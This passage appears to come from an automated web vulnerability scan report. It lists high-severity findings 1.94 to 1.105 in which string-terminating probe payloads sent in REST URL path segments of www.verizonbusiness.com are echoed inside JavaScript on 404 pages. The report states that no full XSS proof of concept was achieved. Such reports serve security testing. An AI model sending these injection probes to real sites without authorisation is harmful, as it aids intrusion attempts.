Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it60ca5'%3b7c3a77074a8/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:25 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it60ca5';7c3a77074a8/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.94. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c0b7"%3bdf82540c12d was submitted in the REST URL parameter 3. This input was echoed as 1c0b7";df82540c12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it1c0b7"%3bdf82540c12d/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:58 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it1c0b7";df82540c12d/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.95. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72e33"%3b7d02c3db74 was submitted in the REST URL parameter 4. This input was echoed as 72e33";7d02c3db74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas72e33"%3b7d02c3db74/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43383
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas72e33";7d02c3db74/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.96. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f78'%3b6b00ceb6d39 was submitted in the REST URL parameter 4. This input was echoed as 99f78';6b00ceb6d39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas99f78'%3b6b00ceb6d39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43385
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas99f78';6b00ceb6d39/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.97. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3824a'%3b2a6b6aee905 was submitted in the REST URL parameter 1. This input was echoed as 3824a';2a6b6aee905 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3824a'%3b2a6b6aee905/it/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products3824a';2a6b6aee905/it/cloud-it/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.98. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 755cc"%3b5f01b832dac was submitted in the REST URL parameter 1. This input was echoed as 755cc";5f01b832dac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products755cc"%3b5f01b832dac/it/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products755cc";5f01b832dac/it/cloud-it/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.99. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e32"%3bdf1c926363f was submitted in the REST URL parameter 2. This input was echoed as 65e32";df1c926363f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it65e32"%3bdf1c926363f/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it65e32";df1c926363f/cloud-it/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.100. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf9d'%3b53551aa3e11 was submitted in the REST URL parameter 2. This input was echoed as 8cf9d';53551aa3e11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it8cf9d'%3b53551aa3e11/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/it8cf9d';53551aa3e11/cloud-it/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.101. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5958'%3bb453e0a2edf was submitted in the REST URL parameter 3. This input was echoed as a5958';b453e0a2edf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-ita5958'%3bb453e0a2edf/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-ita5958';b453e0a2edf/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.102. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f15e"%3b3018bdfda75 was submitted in the REST URL parameter 3. This input was echoed as 4f15e";3018bdfda75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it4f15e"%3b3018bdfda75/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it4f15e";3018bdfda75/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.103. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29aec'%3b425ce2e213b was submitted in the REST URL parameter 4. This input was echoed as 29aec';425ce2e213b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas29aec'%3b425ce2e213b/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42871
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas29aec';425ce2e213b/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.104. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c59"%3b42e0fe965dd was submitted in the REST URL parameter 4. This input was echoed as 51c59";42e0fe965dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas51c59"%3b42e0fe965dd/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42871
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas51c59";42e0fe965dd/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.105. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c375e"%3bc1272064ae was submitted in the REST URL parameter 5. This input was echoed as c375e";c1272064ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas/security.xmlc375e"%3bc1272064ae HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43399
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
i="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas/security.xmlc375e";c1272064ae";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

